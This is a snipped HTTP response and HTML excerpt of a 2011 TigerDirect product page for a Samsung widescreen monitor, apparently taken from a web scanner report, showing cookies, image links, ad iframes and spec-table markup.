Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=15; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393&Referer=; path=/
Set-Cookie: SessionId=3551021720110129210352173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177746




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/masthead/bluelogo.gif" alt="TigerDirect.com" border="0" /></a>
...[SNIP]...
<form action="http://www.tigerdirect.com/applications/SearchTools/search.asp" name="searchFRM" id="searchFRM" onSubmit="return chkSrch(this.keywords)" method="get"><img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"><input name="keywords" type="text" id="tigerv2_searchform" size="35" maxlength="90" style="padding-bottom:-2px;" onfocus="if(this.value=='Keyword or Item #')this.value='';" value="Keyword or Item #" a
...[SNIP]...
<form name="subscribe" method="post" action="http://www.tigerdirect.com/applications/email/d_subscribe.asp" onSubmit="return chkEml(this.email)"> <img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"/><input id="tigerv2_dealAlertform" name="email" type="text" size="13" maxlength="50" onfocus="if(this.value=='Email Address')this.value='';" onblur="if(this.value=='')this.value='Email Address';" value=
...[SNIP]...
<a style="color:#FFFFFF; font-family:Arial, Helvetica, sans-serif;" href="http://www.tigerdirect.com/cgi-bin/ShoppingCart.asp">Cart<img src="http://images.highspeedbackbone.net/mastheadusb/cartd.gif" border="0" />  
       <span id="cart_item_count">
...[SNIP]...
<div id="site_logo"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/tigerLogo_overlay.png"/></div>
...[SNIP]...
<a href="#" onClick="lightbox('ccExO_wrapper','close')"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeButton.png" alt="Close Overlay" border="0" /></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/nothanksBtn_blue.jpg" border="0"/></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper2','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeBtn_grey.jpg" border="0"/></a>
...[SNIP]...
<nolayer>
<iframe src="http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" width="977" height="40" frameborder="0" marginwidth="0" marginheight="0" scrolling="no">
<a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?">
<img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?" width="977" height="40" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?"><img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" border="0" alt="" /></a>
...[SNIP]...

<img src="http://images.highspeedbackbone.net/main/pixel-clr.gif" height="2" width="1"><br clear="all">
...[SNIP]...
<a href="/applications/Category/guidedSearch.asp?CatId=12" id="guidedsearch"><img height="30" border="0" width="145" src="http://images.highspeedbackbone.net/campaigns/yamaha/images/spacer.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="0"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td height="7"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td width="40"><img src="http://images.highspeedbackbone.net/homepage/icons_01.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_02.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_03.gif" width="40" height="24"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_04.gif" width="40" height="25"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&Qty=1&h2fedpno=6635886&ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&Qty=1&h2fedpno=6635947&ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6052506&csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/V18-2238-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6052506,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5372536&csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2220-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5372536,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5532654&csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A179-2264-main02-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5532654,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5719289&csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/H24-2206-main002-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5719289,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=14956&csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2222-mainv01-ec.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(14956,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/add.gif" width="276" height="17"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1','ImageCart','scrollbars=no,width=525,height=768')"><img name="imgLarge" src="http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg" border="0" alt="Samsung B2230HD 21.5" Widescreen LCD Monitor" onerror="this.src='http://images.highspeedbackbone.net/SearchTools/no_image-med.gif';"></a>
...[SNIP]...
<a href="/applications/searchtools/search.asp?keywords=Samsung&mnf=758" style="border:0"><img src="http://images.highspeedbackbone.net/VendorLogos/samsung_logo.gif" border="0"></a>
...[SNIP]...
</span>.
                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">(
                       2 reviews)
                   </td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a href="item-details.asp?EdpNo=6532393&csid=ITD&body=WARRANTY#tabs" rel="nofollow"><img src="http://images.highspeedbackbone.net/item-details/extraprotection.jpg" border="0"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
</tr>
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"><table>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"><br>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=1','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-01.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-01.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=2','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-02.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-02.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=3','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-03.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-03.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=4','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-04.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-04.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=5','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-05.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-05.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1&imgcounter=6','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-06.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-06.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="6"></td>
...[SNIP]...
</a><img src="http://images.highspeedbackbone.net/itemdetails/0_3.gif" height="41" border="0"><a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&csid=ITD&Sku=S203-2293&imgcart=1','ImageCart','scrollbars=no,width=525,height=768')" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','http://images.highspeedbackbone.net/itemdetails/1_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/1_1.gif" height="41" border="0" name="Image1"></a>
...[SNIP]...
?EdpNo=6532393&csid=ITD&body=REVIEWS#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image11','','http://images.highspeedbackbone.net/itemdetails/11_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/11_1.gif" height="41" border="0" name="Image11"></a>
...[SNIP]...
s.asp?EdpNo=6532393&csid=ITD&body=QA#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image14','','http://images.highspeedbackbone.net/itemdetails/14_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/14_1.gif" height="41" border="0" name="Image14"></a>
...[SNIP]...
D&body=MAIN#productresources" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image9','','http://images.highspeedbackbone.net/itemDetails/techspedia/button_over.jpg',1)"><img src="http://images.highspeedbackbone.net/itemDetails/techspedia/button.jpg" height="41" border="0" name="Image9"></a>
...[SNIP]...
p?EdpNo=6532393&csid=ITD&body=WARRANTY#tabs" rel="nofollow" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image7','','http://images.highspeedbackbone.net/itemdetails/7_2.gif',1)"><img src="http://images.highspeedbackbone.net/itemdetails/7_1.gif" height="41" border="0" name="Image7"></a>
...[SNIP]...
<a href="/sectors/ironclad/index.asp" rel="nofollow"><img src="http://images.highspeedbackbone.net/itemdetails/tab30day-b.gif" width="78" height="41" border="0"></a>
...[SNIP]...
pt:loadWindowGen('/include/whybuy.asp',600,600)" rel="nofollow" onmouseover="MM_swapImage('whybuy','','http://images.highspeedbackbone.net/itemdetails/tab13_1.gif',1)" onmouseout="MM_swapImgRestore()"><img src="http://images.highspeedbackbone.net/itemdetails/tab13_0.gif" name="whybuy" width="63" height="41" border="0" id="whybuy"></a><img src="http://images.highspeedbackbone.net/itemdetails/infotable_rightside1.gif" width="7" height="41" border="0"></td>
...[SNIP]...
<td valign="top" class="font_size3"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="100%" height="5"><P>
...[SNIP]...
<br><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"><img src="http://images.highspeedbackbone.net/item-details/duopixel.gif" width="100%" height="2"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
LED Backlight:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Screen Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Widescreen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Diagonal Size:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Colors:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Display Format:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Touch Screen:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Interface Type:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
HDMI:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Maximum Resolution:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Condition:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td class="techspec" width="45%"><img align="absmiddle" src="http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg">.
Features:.
</td>
...[SNIP]...
<td height="1"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
<td height="1" bgcolor="#f5f5f5" colspan="2"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
<td colspan="3"><img width="1" height="1" src="http://images.highspeedbackbone.net/main/pixel-clr.gif"></td>
...[SNIP]...
